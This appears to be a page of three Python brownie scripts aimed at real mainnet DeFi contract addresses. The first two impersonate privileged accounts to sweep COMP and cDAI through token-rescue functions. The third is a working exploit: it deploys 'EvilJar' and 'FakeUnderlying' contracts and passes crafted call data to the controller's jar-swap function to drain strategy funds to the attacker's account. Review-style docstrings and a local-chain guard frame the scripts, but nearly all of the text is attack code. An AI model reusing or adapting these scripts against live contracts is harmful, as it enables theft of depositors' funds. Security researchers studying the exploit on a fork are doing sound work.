Beispiel #1
def seize():
    """Sweep COMP from a strategy through the controller, printing balances.

    Runs as a brownie script. The sender is obtained with
    ``accounts.at(..., force=True)``, i.e. an account whose key is not held
    locally, so this only works where the node lets brownie impersonate the
    address (presumably a development chain or mainnet fork - confirm
    against the network config before running).

    Sequence, as visible in the calls below:
      1. print the strategy's COMP balance,
      2. ``inCaseStrategyTokenGetStuck(strategy, comp)`` on the controller,
      3. print the controller's COMP balance,
      4. ``inCaseTokensGetStuck(comp, <controller balance>)``,
      5. print the sender's COMP balance.

    NOTE(review): the two ``inCase...`` functions are not shown here; from
    their names they look like token-rescue entry points. If so, the script
    shows how much value whichever role may call them can move, which is
    the property to check when reviewing who holds that role.
    """
    comp = interface.ERC20("0xc00e94Cb662C3520282E6f5717214004A7f26888")
    controller = interface.ControllerV4(
        "0x6847259b2B3A4c17e7c43C54409810aF48bA5210")
    strategy = interface.Strategy('0xCd892a97951d46615484359355e3Ed88131f829D')
    # force=True: use this address as sender without holding its key.
    privileged = accounts.at('0x907d9b32654b8d43e8737e0291ad9bfcce01dad6',
                             force=True)

    def show(label, holder):
        # Balances are printed in ether units (COMP presumably has 18 decimals).
        print(label, comp.balanceOf(holder).to('ether'))

    show('comp strategy', strategy)
    controller.inCaseStrategyTokenGetStuck(strategy, comp,
                                           {'from': privileged})

    show('comp controller', controller)
    # Re-read the balance so the full amount now on the controller is swept.
    swept = comp.balanceOf(controller)
    controller.inCaseTokensGetStuck(comp, swept, {'from': privileged})

    show('comp penguin', privileged)
Beispiel #2
def insider_hack():
    """Show which balances the strategist account can move on its own.

    Runs as a brownie script. The sender is whatever address
    ``strategy.strategist()`` returns, taken over with
    ``accounts.at(..., force=True)``; that needs a node that allows
    impersonation (presumably a local fork - confirm before running).

    After each step a table of DAI and cDAI balances for the jar, the
    strategy and the strategist is printed, so the effect of every call can
    be read off the output:
      1. ``controller.withdrawAll(dai)``
      2. ``jar.earn()`` three times
      3. ``controller.inCaseStrategyTokenGetStuck(strategy, cdai)``
      4. ``controller.inCaseTokensGetStuck(cdai, <controller balance>)``

    NOTE(review): the contracts are not part of this file, so what each call
    does on-chain is inferred from its name only. The defensive reading is
    that every one of these calls is accepted from a single key; whether
    that key sits behind a multisig or timelock is the control to verify.
    """
    controller = interface.ControllerV4(
        "0x6847259b2B3A4c17e7c43C54409810aF48bA5210")
    strategy = interface.Strategy("0xCd892a97951d46615484359355e3Ed88131f829D")
    dai = interface.ERC20("0x6B175474E89094C44Da98b954EedeAC495271d0F")
    cdai = interface.ERC20("0x5d3a536E4D6DbD6114cc1Ead35777bAB948E3643")
    jar = interface.PickleJar(controller.jars(dai))
    # Original author's note: the strategist is an EOA (a plain key, not a
    # contract).
    strategist = accounts.at(strategy.strategist(), force=True)

    watched = (
        ("jar", jar),
        ("strategy", strategy),
        ("strategist", strategist),
    )

    def status():
        # DAI is shown in ether units; cDAI is scaled by 1e8.
        rows = [
            [
                label,
                dai.balanceOf(holder).to("ether"),
                cdai.balanceOf(holder) / 1e8,
            ]
            for label, holder in watched
        ]
        print(tabulate(rows, headers=["contract", "dai", "cdai"]))

    status()

    controller.withdrawAll(dai, {"from": strategist})
    status()

    for _ in range(3):
        jar.earn({"from": strategist})
    status()

    controller.inCaseStrategyTokenGetStuck(strategy, cdai,
                                           {"from": strategist})
    status()

    # Re-read the balance so the whole cDAI amount on the controller is moved.
    held_by_controller = cdai.balanceOf(controller)
    controller.inCaseTokensGetStuck(cdai, held_by_controller,
                                    {"from": strategist})
    status()
Beispiel #3
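def main():
    """Replay a controller swap with caller-supplied jars and call data.

    Runs as a brownie script and refuses to start unless brownie's local
    RPC client is active. The check is an explicit ``raise`` rather than an
    ``assert`` so that it is still enforced under ``python -O``.

    What the visible code does:
      * resolves the DAI jar and strategy from the controller,
      * deploys the project's ``EvilJar`` and ``FakeUnderlying`` contracts
        (not shown in this file) from the first local account,
      * ABI-encodes ``CurveProxyLogic.add_liquidity`` inputs whose ``to`` and
        selector fields point at ``strategy.withdrawAll``, ``jar.earn`` and
        ``strategy.withdraw(address)``,
      * passes those as ``targets``/``datas`` to
        ``controller.swapExactJarForJar`` with the deployed jar as both the
        source and the destination jar,
      * prints DAI/cDAI/COMP balances before and after.

    NOTE(review): the controller source is not on this page. The fact that
    the call is made with a freshly deployed jar and free-form call data
    suggests the controller neither allowlists jars nor constrains what the
    approved target may be asked to do; those are the two checks to look
    for when reviewing a patched controller.
    """
    # Explicit guard: an assert would be stripped by -O and let the script
    # run against whatever network brownie happens to be connected to.
    if not rpc.is_active():
        raise RuntimeError(
            "local RPC client is not active; run this against a local chain")

    hacker = accounts[0]  # first local account, used for every transaction
    controller = interface.ControllerV4(
        "0x6847259b2B3A4c17e7c43C54409810aF48bA5210")
    dai = interface.ERC20("0x6B175474E89094C44Da98b954EedeAC495271d0F")
    cdai = interface.ERC20("0x5d3a536E4D6DbD6114cc1Ead35777bAB948E3643")
    comp = interface.ERC20("0xc00e94Cb662C3520282E6f5717214004A7f26888")
    curve_proxy_logic = interface.CurveProxyLogic(
        "0x6186E99D9CFb05E1Fdf1b442178806E81da21dD8")
    jar = interface.PickleJar(controller.jars(dai))
    strategy = interface.Strategy(controller.strategies(dai))
    print("jar", jar)
    print("strategy", strategy)

    # Token the run is parameterised on; both helper contracts receive it.
    steal = comp
    evil_jar = EvilJar.deploy(steal, {"from": hacker})
    fake_underlying = FakeUnderlying.deploy(steal, {"from": hacker})

    contracts = {
        "controller": controller,
        "strategy": strategy,
        "dai jar": jar,
        "evil jar": evil_jar,
        "fake underlying": fake_underlying,
        "hacker": hacker,
    }

    def status():
        # DAI in ether units, cDAI scaled by 1e8, COMP scaled by 1e18.
        rows = [
            [
                name,
                dai.balanceOf(c).to("ether"),
                cdai.balanceOf(c) / 1e8,
                comp.balanceOf(c) / 1e18,
            ]
            for name, c in contracts.items()
        ]
        print(tabulate(rows, headers=["contract", "dai", "cdai", "comp"]))

    status()

    def arbitrary_call(to, sig, param=None):
        # `param` acts as a flag, not a value: when omitted the last
        # argument is `steal`, and ANY non-None value selects
        # `fake_underlying` instead.
        param = steal if param is None else fake_underlying
        return curve_proxy_logic.add_liquidity.encode_input(
            to,
            sig[:10],  # "0x" + 8 hex digits: the 4-byte function selector
            1,  # NOTE(review): meaning of 1 and 0 depends on add_liquidity's
            0,  # signature, which is not shown here - confirm against the ABI
            param,
        )

    earns = 3
    datas = (
        [arbitrary_call(strategy, strategy.withdrawAll.encode_input())]
        + [arbitrary_call(jar, jar.earn.encode_input())] * earns
        + [
            arbitrary_call(
                strategy,
                strategy.withdraw["address"].encode_input(steal),
                True,
            )
        ]
    )
    # Every payload is routed through the same target contract.
    targets = [curve_proxy_logic] * len(datas)

    controller.swapExactJarForJar(
        evil_jar,
        evil_jar,
        0,
        0,
        targets,
        datas,
        {"from": hacker},
    )

    status()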